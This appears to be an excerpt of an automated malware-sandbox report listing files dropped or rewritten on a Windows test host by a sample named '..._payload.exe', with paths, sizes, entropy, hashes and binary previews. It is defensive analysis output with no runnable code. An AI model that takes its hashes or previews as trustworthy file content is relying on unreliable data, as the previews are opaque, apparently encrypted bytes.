                                                                                                                          Preview:<?wpl..... ..#.RNT|d.{..;.r_)..:.c....i^.-..v.2.p..*.....|..qR0...>......h=l.8.#.2.5.....#...P..i...=.."3n5u.)S.. ....G.q.wx....<Xk.=...D..I~U&..r.|...!k.....P..*...JQ.....-"..Z.7...P...%.-..!..RY>... .....n..3...W.E..o.E}.....B[.?...Ce.......;Y..5[.s...r...hp?v...',]...l.........3..".D'O.U...P..<.u..b....u.|.b98.^N...........thJUS=.......i..Y'....YP....iP..P..Zk..Q..%.J..K..@nF.q...........+.+.|.0.........s..e....Ep..$.h0.o.X............)....{..a........d...I<.T.WK....f....Y.p..C......p...(XKo!wT....w2%..`..&7...u`...x0..;....9......K.>.......%C../.aqO.....Y.3...2.....g....... oA..S...rD..9o#6.....@.........^b}.<|....w.n....w....g.v..D.:ER#.D......l...H..~.d.c..._....#T....U%..}C...p........W;$....F.....E?.#....)*..9.).9.c2.+Z..k..l...._......I.i.QU.+..u..}..(@.;..Uk.(_.....z.......}....*...qA*P...&.......Y.h+...7...v....;...<.../3P....q88...A..z....4.$8.s...}.u|.bG...=.x8.q.R.. ...b.........o._34..F..e6q..V.<.T....].`...P.....X....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\10_All_Music.wpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1397
                                                                                                                          Entropy (8bit):7.860391698844272
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:m+Yaygz7f1pkwIEIoTIU045952f00pZI1zYR1ufivMorrVWDvGTBpqbD:moygz7flFVth952M2cBvhvcpID
                                                                                                                          MD5:6F71472186BDE6656D973946151E822B
                                                                                                                          SHA1:27B0FB55A9149ECD3075A2DFF45798E418B11934
                                                                                                                          SHA-256:A238F657242EFE6016285115FA798786908A05EA7C7B3D76046EE4B6E650613C
                                                                                                                          SHA-512:E47574740A3AAD48AF30AD675C94600BBADF2D521760F6029AE290953A60DAE4AF95D39CDF80603CDF53F651D597AFF0B9D918B6E0D4C596671255CBE9C75F0A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?wply...y..s.#8.....JV.."_.g)..;a.*6l...d.7[..xS....[..W...1...ka ..D.......m.N-.aO.x..I...H...fn...m*.i..m.CR.......$.<..}......*U..P.',.D`.S.\.E.8Z0c...^.a.F..`..@.YR.z.Ad5L..U+...X.....x..z._yVikr*.7........VY..v...!p....q2.+<....E5y.x.[..f.......7.....`............Zf^.-..?.....DL..b...$-=..p.......{]6..K...f.......IJuVz......?.v.A.FTo...z...e.B...........N..k.&:.L$...:...-)}..T.....&T.iH..g>..K..UM...e...L=_...4....;...]h3.LCM...Y8.v...L.x.q.Q...A..+u.w.....@..........L.q.<..#...a.|....V..K1n.Q..b.....Z...............{d^*y...e....F.RC.}o.-..r...?.f....of.........{.V..W[@.?..h......./n.hO....~....B.o.*.WqmO.W.)A.5qq.....;7....M.*._.+..07...!L.~..b..5G..'...1.H.....){p....W..wX.,.g.d.6.m..>..q.e.[.W/U....|=Bb.Zb.4Fr|8....I1.^.".....&.Se.5..(.8j.^.d..'........[A.V..&.$?...E...|..{-..2.W....R....G%/..n.TP...Ie4..p.ma..4.'_..B......VAL..;...nn8g.zDC....[..."..B....O..}.+.....^E.x*.s..D.......j...~Is....C1..%..~8......=<&..X.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\11_All_Pictures.wpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):919
                                                                                                                          Entropy (8bit):7.769756423588849
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:FHNhuQVV/JMWHw8+fEjATo1Lo+99fMyJglPJBud1ubD:FHN7gWHw8+fEMToxOa6gGD
                                                                                                                          MD5:463625A873B4D0ECAE6AA18116073A20
                                                                                                                          SHA1:F52715A9556C9F4A55B733A90609604207B3441C
                                                                                                                          SHA-256:A63291E79E39725AE1265BBFC690CD44491291DB537095F935488E31D0460661
                                                                                                                          SHA-512:9DFDE2B2DEC38C42E3E57A80CE2F890108AD6360CE63FA13651D51E43D4CA57F737EF582BD85DC7444513EE90683ADF82D940459E96D60A5B14274E309B790FD
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?wpl..7.0.1.....J9p.g.....T....3........|..uz........9;.~....y..W....N.^h..Ur.*;.......6F?....U.\[..U...xg..Biv......Gp.......'H../g...h.BM.{....*([.J............"..U....!.p...=D..|.P.q...#..z..d-X.V..93-...Wl.R.7=.e.'.g.w....?ut.Y..Q..=..s.x.=...(..C...h.....'G3y|.......gh.7#..,SG.........$....O.S.R}....7.F.. ..A.o..3.u.......:]..6.1*yeD..-<..O.........O...%6....$..yO.<$.1..c.VG..1...Br....H.}..S...k...R.......1#;!.BS*-g...4...O..~U.A..:...uQ.$...7...rv.W...Oq...v..]..F.v.f.m..<j.L.f.D..........=..j....d...Vl.\2...O.s..u..>..P....pauP=-.2..t...V....V...h.....P!.t.P>...>|;<....@5Y,..,-.PN..?...k...)..'IlZf..)..3.x..+k.e.l.w...y...&.......pvE.&.i..H......5.H.C ...}.J.ET|.........N4...;Bn.n..%Ny...6..UyUG.4....%.].....;.."......Lw.e..d...c...e7....*... .'4.i]@[..j.8'M..#.....,..%phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\12_All_Video.wpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1413
                                                                                                                          Entropy (8bit):7.85242290500634
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9ZlQnayEaPw849ewCAfa38zsTDto6dOi/VL0G0lRh2AsGAeDHrhF/PsbD:9Zlwapoc9ewCAfaszso9aqrfLAmaD
                                                                                                                          MD5:AD7A4365758987BD07A49559DD50AF82
                                                                                                                          SHA1:C99D8CDAFBA72A175F9711E6E23E2138C34D415F
                                                                                                                          SHA-256:46E387D0793AAA5C8B8A43900FFB875D4DCF5335B5ECC25D4F5E1501D3A8DB20
                                                                                                                          SHA-512:07076B87AF4D450A476B7FC5039C7481200C1A212D27445A2C545DA6EECDABDB86A629971860AC08122A95946C06D4BB42290ED6DA2CFDC7C9783186216294A0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?wplC4!A.H....q.Y._9.PL..K....{f..m8_gAfo.CY.iLm/u|.Vp..f3.S4+&.2. ...].>U.f.f....?...g_b...)R11.Wj.._y.R*....E....x.....R...D.1......=f...-......i.:."..a..].......#.o......kP..\...y4Ga..O..k..a.=$.LA...>.4.9xh/71]<.U..WlI...fv..........`......4&>M.7v!.kl....8...=B....D.|....e...:.b..`....|..g..U........?,.x}...\....*)9[P....F....m.|_.E=uU|.1.........u........%..x.....:".,h.#.uq..Z....2..a).....p....i#.....)r.(.y.R.......d9iy..W.8.....>W.Kx..`.z...3......%....n....a..e...?...\.x-..;...;.*..y..<..C.Dj........b..AQ=....h.c.YI.j]>o!+...6cn...}./D["?H.rZQ.q.>......z............VX`...J.8...L....Z.>....R..]H.;....'y......h....}.:_.....)K!.,.n..5BD.y....f._.....nA...zs..A...MK..{../t....CY....O.V.k.vz....V5.a.[.*....K]...n.P.....p..K....aL..g......8..;..%"....}.9}..m.........J..I..}2...u'........O.......t...E8.4_O3...'.....-.Wv.ydh.P....w.Mb......z..0..".?.8[t.k.X&U..y`..7...70....+bv.bH..z,tH..'.7mP.`o.L..a..k...I,.........#.I.c...f..m

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{45F61A7D-A745-417E-BD88-2FFDE87A6DA8}mt16400656.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7074
                                                                                                                          Entropy (8bit):7.973036577199829
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:H61me8bHfKBJWpdmHKAmUQ0e/r/P4/8l2o+IW:aKbHMJWKKAmUGL4Eh3W
                                                                                                                          MD5:648C37CFBFB120F98B6DDDCC388EC9B9
                                                                                                                          SHA1:3F3A2D4944CA7E0098DF6BB647BB14458ABA722D
                                                                                                                          SHA-256:41C53D7FA38CA565FDF8094100FEAA2137292E6EEF5AEB34BBE735534D9807E0
                                                                                                                          SHA-512:E2FBA146508C035C24BBF273CAE902303378AD08A24BC8AC15606F8DA0353C31C910FA7BFF0FA7884BFC4E462FB349EE9DB5E038F0228EAC1BBA480FFBACE5B1
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG.o..ZS@.N..RG/.....?....]....e.?......)..........9.q....u.fJ.RY..F.....i..S..v+.=..H2...g......e.r.......dkT.S....O.!.....zo9......|$.o5.=..$.0...>b.FL....?..k>|.....:.r....P....")...,..H......&...~.....C#B..O)..Qw7...._0>.b..Z$.X=..;L..i.....x..=...-..ng.7.A.b..2N):..F<....,)...e.c%C...e..Su....-&..(.x..5V...E...kx...>......w........$.....m.Xvn5.*..c...&.c.N....J7....&(*......_.../....;..5.cP.<}....1../....,T.mp.>......~j..\...A.....x.O..D...'.|....\....G,.y.....j.H..C....~U...._S_..m..k.H'.k.A'^UI*(.j.....4tZI...I...|.....Z........M...h..k<.?Lm.<...YM...6... $y....B2TD.8[yiJ*..0.O.qm....,(.....+k{..g...{...Q>Yu.R..~u.......<....5.....K.[..j....V...b3...R{...fG...../G..Z..[..u.%fP.3..v;...C....Sq.z....z......?.~3[w..'..Q..f..8.^p.O.i...'..OLg......b.m..N@..]...6...H9.......c...G.}...2...)...0..t..'.J<c%X...YJm......xg.xs.........!.E..R.`f<e...*..Mb.S?.$.":E][.l....e.9C..iUi5....,.v.N.%....NV.K...O*./..l]'.|.:.{..6..)C

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{7B3AF8A2-A95D-4447-ACC9-7895C91C2D45}mt16400647.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7438
                                                                                                                          Entropy (8bit):7.971392082333106
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:bcIzT9BkD0MCSmFbNhEoCceZUhAqnCM51PG+I5:bcIzT/kD05SQ5OHvu5Yj5
                                                                                                                          MD5:00A1FEF6511F22294CB74571E4AE360C
                                                                                                                          SHA1:5A856D99843D94BE0892488F042A7D9644C3C2D2
                                                                                                                          SHA-256:7C5D3DC3BD8E89546298541062C914EC86592FC6F71A3DA9D149D9D318ABD589
                                                                                                                          SHA-512:840F850EF7430076D9E7123690DCABE4C1B62B0590E3CBB093A814C328E11EF713CA0913CFCC81AC8FBBA6F7A1FEF521EC678A89EC876BFAA05BDFEF2996E6D1
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG..T...=d.d..k......YU..~..iL...w.7$p...q..uD.........*t.shj.T.#..%.R^,.r.)..P.th..`.Bdq...~y.u...^.b...}..dzA..YC.QHc...y..|..we+..6........l.m....Y.$$Rv....2.|T~O".oo...'..!}U..$L.I....R.Ph.6...'.0.U5D...Wq9.(A......Qc=.<.oX.d.......}.....Lo.W...s..XgJ4@..9.;Z..=.&_.v"j..?`.M....v.;..g..^.z..3.b.m..v.UR..r2.....&.y0X......*E...f.M...!{.zL......xN....F...mt8EV...R......)BA./....hUj.>>.3F.....K....;_,..$C.N@....5.....C..l..... ......De.*.t8.A..._@...%./..EA.TW..xP.z.l.BI.....$X...F.1w}.X...$.d.utR.\J....J..f..D ........-%&...O{.I....\.781..........;..~>.94.......s3.....0.....7.jt.T.8.hUy..^'...g..1'.+.g.-F...."F..O.. ....M,D..9......C.i.t.8M.........r.E..o.<....&.+}..$.R.J=.EQ...sA%...{8.t.).Q.Q...........3...k..0...e...d.>...Z}...F....z.H(..~lu|..."......A......+.~........f....!hYL.H......@.p....A}.v?y....0c8.B..i.Y(..Kd1.J.o....Z_..qY..j-....C......Gq..i.....2..W.....,.g.....\.8Y...E..0...KV.U.+.p.B[....ifsE^....Y.Or..M.H.....Q.*.....Z

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{7D2AAE1F-E21C-4042-8EAB-08D27101C10B}mt11414620.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8887
                                                                                                                          Entropy (8bit):7.9794832024773985
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:F2Leu/y0hpK3NKcy0yt/uvBtpgoGmovsmaEJ8P2+sXzqqo:ieu/di3NsmTAmov/axzsXo
                                                                                                                          MD5:00CDAA64ADC159846A9A02974E85E3CC
                                                                                                                          SHA1:CAA79D7CB380012571228BBAF570A1662AB40B40
                                                                                                                          SHA-256:11603C6B02285D8623E170DC8AEFA495D08F8987F25CA046433863E46B8538AF
                                                                                                                          SHA-512:B8A110BF1490DBC5C11B2E2F35B819B1903E6EB8D2031F029380C7432E88A7527333628D2169B8F594780F60F7747DFDE57B53DF4FAF320ACCD2E73E7E338F7E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG.;....I.n.>..Y-.[.83t.q.q...Yn.3Y.F.K..iN.c...L.w.v+;l....G.5...0.J.H..O$.....?.N....i.B.l...VC..'{G&...$U...,[..k.......8v.F....t..B#@]....|=9.O...z....j....1....,N....6..pl...A.:.7.?^nn..F.@.g....K...k.?......j...T2.U...~S.Z.u....,F......).....4.m..t&..f. ...&/w....!z.z.ouc....w.q.<.S....."..d`.:......c.c@*.'.>......h..a..+..m.}..O..zR.3..V....QG..b ~.[#.i......3.....m.}idb.?.n...l.g.5wl.X.1..L...)...8.,|e..R...U........B.4..u~.....o.L.{A.EA....k+C`.i...S.{...:_..d.8.~.L.r.()Q.So....2...../...bN>cZ.-"..5"..~.PY..@.W..V....W..!z...4..M...y..m....Y.5..9L..^..U.*7...-.^.&...i..R..0...s2..8;..s..y.C..8(W..]_.Z4...U...c..0WY.....'|g9.-6....T}..g.(`..Y.>.. ....c.F.x!. ..@......J@.......Cu...&$.....,...O.[.....t.,C.. ..8.I.m`...2..;9.Vq8....G...f..#..../.../.%K.4.P*&.`.L}.7..}.%..8".`......%.(.b....($.......w..3..Kz......9............K..:.....w?..(....U.`..U/,......@b..8.. ....:...L..gb...C.......&.....K.........8..B.jN..D.2hk...{

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{967E9DC2-54C6-4D72-9409-715F9A3F61E5}mt11829122.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):14457
                                                                                                                          Entropy (8bit):7.988932261974641
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:8VRe5X89IzviEHtKDJT6/n7b3NWqHmAXy8kWuCxQ:J89IzviEHsVTqWqGAXy89e
                                                                                                                          MD5:6BBC994E7EE5E133B9E76BC7A522ED6B
                                                                                                                          SHA1:52AC16BDEC6C8BB02CEF6828A7A8F9D330D70F6B
                                                                                                                          SHA-256:4FFEE1D105C0C64C1E695710B319A3B21A84F47ECFAEF43D9BB48727A5B1767D
                                                                                                                          SHA-512:6D9921D960B3E42A81A18FB931F2A503EC2042CEFE22F7F3037E31B395993B880797E1F9DE14F7C8AE50491F77D5F95DEDD6C93510C3C35343D47F8C612F7042
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG..<..f.q.C.K[P..f".P.#C+.O.J.\...=.$.7ez.C...%.....4..>...%.-..U8{th.,.FG...g...V.....eXU.......o$X[....[.t.... .K..+....-.J....2............(....>b".Y.f"..x...GA.IQ...g.......HX...l..pT../...S.8.Ah....*V........0f..a.=.K=W.b.=....(R..9./.-...V..C..Og.w-:.zH...;..l....l.M..3`cQ.w.)r5....zmkg;*.=..I..L..y..g.*..B.n....i0`n....Gz..{.....i......eX...xZ.7i.[....G....B6S.X...Z+...|@..l.^.]./....j..W..k-).......\y.*K.xhHFJV......py.}........Sz...0r...%m..9...g,...MW..........1.g.d..Q.i.r......#.|fJ.B....d%.z.e".L&.].I..8..%.....y..k.S..j.ee..W.....'v..D.:.......Q.4(w..|Q.X.i....&.v.O-..].D..%..YC......0.p...5.......F.......Q.O.m#...\?...&..t..)>.[.u.&l1.U(.~G-{0S7.iA..>l..0...M,a..}.`..X.O..d:..w.`b...< .T^w..kW. .^j.q....4.O|.oX..|.3.I1..<..;.A...Y..s.JyE{-}.Q..A...g..P..a.<.#3..l.kc....i..].q.(*...|.7N..Z..Y.g..s\.r.k .(...E...KE..3.y..{..mZ3R.......0Th.......f..H. .].zN^.2...{I..-......O......#...df...q..%..../..n..L.....V.Ox..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{A4858C46-92BF-4775-ADF9-F93EB4C5F636}mt66963475.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7986
                                                                                                                          Entropy (8bit):7.976989909801464
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Xg64eS7EhEw4QfO9F2T6sSN4JgwdG533yHl3:QeSk5W9F2uhxVul3
                                                                                                                          MD5:C0BC87FCC7EB3C339E07EF06F7DB1B33
                                                                                                                          SHA1:18CD5757C72BE4DF9FCE03983DF4ECAEEF6F3501
                                                                                                                          SHA-256:1EC53BEE8C1B328B50760C9145D6CE0109F9083F407E4F9D3D00EF38010E159B
                                                                                                                          SHA-512:341B6966316AAAA4AD32806911D8FF7C0F5B1AD9E9A3236C07C2AC94F4C78686706356DFC63569479C24AA87EE08F4EF20F501147BEE528664FB692D06ADB2CF
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG..F.^oq......* .#.3-P....Em.I..8....7...%...ql...m.XF......i`/..MfZHY.z.H.hX..*....5..!j{...e.Vi.......>.. ..5...d.Q..Y..^.\.+..e1.....aT.........XMa.#w ..H.s.`_-z.}.^] jd...&.b........w4......*..C.;<"U...=]....C.9....c.a.+..W..|4__H..^n.G...d..Q8...}.Q]......;.14:..wN.-.B..o.i+.6...a(...}...Ax...q.T.9..H.b.._=+...9bO{.d.5@2......C.<...O1X.a.o..9...[.Z./.+.....i3.uNW.m9.;.LX.c..^$....ATb.P...6. ...j.>v....W!..j $S..].........ir..2@...{.J.(w.'.!b!1W..aA.=..J.w....M.aX.6..rh...|....\.....2b3....n....u.W..S.0...Im..G...po.~2[pM..t..m|..E#i..;......V..z..X.i O..U.I.....d.3^.6..(O_Hk..Dv.9....p.0.0..i.$..........c/.H.]s......'Fj.H2...@.%.u..../.0.-.c..;..../o.A..o.G.....Z....2.N......wf.........|......;O.~....6.@.....l.m....E..U&..Dn...KW...1..0..$....l@_..T.k..Ay...9Uo...n.z...mF....-......~`./..f..sD@..kgxV......n../[..d..x...N..X..D.@..6F....Bd...3S.c..pu..R..j...&.pY.d~)..S.m=.......o...dL......jJ..v.SP.r.wYAq+....a...E....,.X.n.o..W;

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{AA4547C7-FE83-48AB-9053-3A60F16A4C34}mt10000137.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5293
                                                                                                                          Entropy (8bit):7.963717902079871
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:o9zCkB1H+1rDUv/W7aY6fWj9JkDXmxwn1wKlkIxqBSGISxff8CEG70mZW9ATfBLp:o9D1e1gmgfWjIughOIZzSxhEy7Y6TBLR
                                                                                                                          MD5:6D55CAC133D407B03A2B35627769127E
                                                                                                                          SHA1:990B4A96EEC96A568B7E2E51EA0906AD49A710A4
                                                                                                                          SHA-256:A9C7D244BBCEA4D86C70D12728B1FEC5F6C0D4AA945CEB1ECBC4DFF76ED44D33
                                                                                                                          SHA-512:C40CF6327066C16410CCA7127873A70F5F9F0EB182F7F6B32BDAEC41B4598BDF698D1CFE18EB4EFC1C382EE90ED9D40800F9B47D554A75D04F0D8092BE3BF16C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG...3..gMG...J4..U.Q+...Zm...+..(P..mo........z...O+.=...Ncw.7..Z.=.G.0.7.(-.(`.8(k....`.8.w.[..w'.D0\g5Eh..S...bYb9....,.\n....-._...+..U.=...;..5.........0...72../.#}f(..w$*u.u;.s..J......N.!.Z?...l.Q....g.....t..V+7..x."Tag..S..(.C.,..f..D..-;.'g..S..|.9.2.$.......5.pe...Y./.?.^..{..TW...y.:..D..z5.o|.{.a..A$.&.hdu_z......wf...J.U..=v&........!F...P...G./._.S..:.e.-E..P=_8?.Z....R..............%.?F#...ii_.K...Z.$u....X....J..`....j.;./:VG&s...y.+m.#.....h...SRz/...B...S..Z..z|%..Pj.q....8.d..[c*{E..I:...ED.AK ..Q.+..%.Q.a..K.>% 2.PN.4E.%..........,.9.K".4.............VL...A...Zn.Q.5..k......{.Mx..q.e{+J...zwB...&A..z5.Y+._..N.T..^......IR.HC..K...O..pvYT/.A.4.h.#k..=m<.$.<.]?.>...7.....!.6....w.8....o.@..m..J_...G.~....T*...=.,...A...q.......y..."z..F..{2.....Ju.k.,.x.y%*.._....J.o...b.fk..;..3G.e..............dK..r......n.....+...e.6.;...8...crR7Ym.5.q.....E..W}.S..75!..o....y..4?3.{!..j....,M..(]..y.2EQ.6..+.VR..P 1i....i-...;

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{F5FB5847-D24A-455C-A647-40C253091672}mt67739505.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9080
                                                                                                                          Entropy (8bit):7.974732657408018
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:sLzSTVg4OLJYEe5hQCy/5loPOx0DnCF8fiee/LE1YnycO0h1Zk+:sqTV9AJ2KCWK2x1OeAoyP0Xi+
                                                                                                                          MD5:0424010E614EFF7908DE724A2223A947
                                                                                                                          SHA1:78A422B7894F1D86C590E342B14B53B7A4B265AC
                                                                                                                          SHA-256:DEAF83B106C537027F27DEAFED49F954F7EF72B8E44DA75423B479703AEA63BD
                                                                                                                          SHA-512:4B498445DF688F4C337AD70E1E80F31C37DF69946E5C3D1CCC3005D750D5AFAFB0B8B9D6E66BFA95D821E89C1DFE15279F3559A89AAAB7B25F831A5FD473B1F2
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG..&kP....&.J..@.1.n..}...9m....R..>.F.T..]... .Ok.....Tuj....m.\P..R....k.i.8.*....t.j...=...Ux+.B..9..-..4?C......m..!.. ...4h....8...C...;.(6|...z+...Q0?..E......CJ.y..*...4....H.7;.~M.W.`.Ph....c.y2q.=.eo..ay..r..t..i..0...s ..&.Z....C.....&:7..(..K.......I...$EB.c...>...U.o....7,k..2`.H.5(5...T..N.."..n.F..~M..lMx.M...\..}.Ka.*U.fx\...5..~&j$..q.Z...B._.....}T.IUVv..(......O.YJ..(<9..`1....wcak.J...f.@.6.B...0..m)..?u...vP..&.2...cm...P.I.rA8..e.6..../Ji8..............i........m...|.91!..M.z.{:u..Y.T\%.=.......-.........jO_&..o.....,.fk..Mp .6RW.>Nzod.<.[...t.../...n..D.j.....[r.g.)...O.......sq..*K.F.Do`"^......-....ZW-.......!2c.......@.q..(...&7..8.Dq.*Ez.I-..4....:..J.......?..p.....@9GDN......-E7. .Y?S.:&Lo.v...<L........W,e.vS~../... ....N......_.dB.....6./..j.-.Z+.A.0X%c.)...FF.#..}.<.......vb.5[....Y/.....h+.P.1+"..9..m..K.Z\.k...Y.-...U<.lK....G.....z..Wi..v.....!......fN.i...5.~I...Z.o....8..w.=:...c1.P....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{FD5FD857-5A38-4C81-A322-3226BB279FAA}mt45299826.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9025
                                                                                                                          Entropy (8bit):7.9823188881407985
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:YEZyLQGkW9gsgMdtlsWryjVo7uIRLZWQL38bCV:YEAbnfqWreVoaIB3+CV
                                                                                                                          MD5:D4FF9F323EFEB4F886A3F7E3EE04F4BB
                                                                                                                          SHA1:12290C38BE5C94C78D287BF3427AF81241E26080
                                                                                                                          SHA-256:E6DCCC4F88EE731ADE8BE3CE79875069AB7CA9E9FD52EC0E1D7626ACC2A6C1B8
                                                                                                                          SHA-512:DC9BC4619016058BBFBEFC781A23CCFB81F7A7F696477C921A8613817EFD0472D31FD9D10C26284B12ED331F3FC116F172F43AD60676710BBA34CA2ADA5FF863
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG..m.2.....$$....KO..%.....~;8..*......j#D..!..j.#.S..y..{.E.f.J4!...p.;.OX...."...[.x3....&;kX....e...X..*:.g...~..dV..dw\..R.jZ........8N...u...BJ...q....7.6..6....O.'.....Y0.:.c=|..............Y..c.4.Ef....]..C.o.'.Vgca...+-..@2|g...A.R`w:.m.Dd.5.Ye".~.$...E...3..=.+.Z3.Km.....|..1B.n..;~..6.b....W.s=9.....+m.5.......%QO...z"....u...E.UZ......??........V...'Y_..u.N....M..!..{......".......k.j.!..G.-.....@..P...>..i.LC@L.S(R.7....ba..Z.P.e.#.........C.>.$...h.u.6R..y.y...R-.g*..n...G.\A.Mr...(L"y).L...x.!..8..on.....*........h..c......).]....r...zR)......'. F....9.........'"U.... Xc.Q..E4x0..]...Tz.qPkm.S....plEE........@M^i(o.v..\..90..]... ...;.(d....r....!C...f...m..YyH.JT...v...8..\.a.....>...!..Z.....+O...O.....=...n.QR.4]...)5..M...4.dO#.%..qE\...&'.....e.Np..;.U...]H..pk..R...RO$.E.....%...lK.j....\..,\.......;.....S .k...]:gPQ..._...y.G..P..._.s%nQ...D.eu..8r.`...5.+...5.g.8k.q"....N...z>1R....$...p.q.....o'X..}.....@.>..V..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):208087
                                                                                                                          Entropy (8bit):7.725627381056036
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:veGX45HAC8WDpV/rWl17YbjiD/+0CGCqBcKgnFkD+/uF20a:v6HPHHalObjA+XgqGa/uMx
                                                                                                                          MD5:F76488F744D360B14D7566CD9CACF5CC
                                                                                                                          SHA1:1FEB5C331839CA660F134446A07A4448245EFB81
                                                                                                                          SHA-256:0F2F6DE3F237DF8886CA421F9A9089D5C16EDB5F5345E61E0BAFB97751518850
                                                                                                                          SHA-512:48E6EA35E8A72841A54439AF2B42D94DB2BF6E52570A115BD2D3EB65A497536E6CC18521483B3B401BE84F33164311A7889A0C48BA2CB610557382C7225E5649
                                                                                                                          Malicious:false
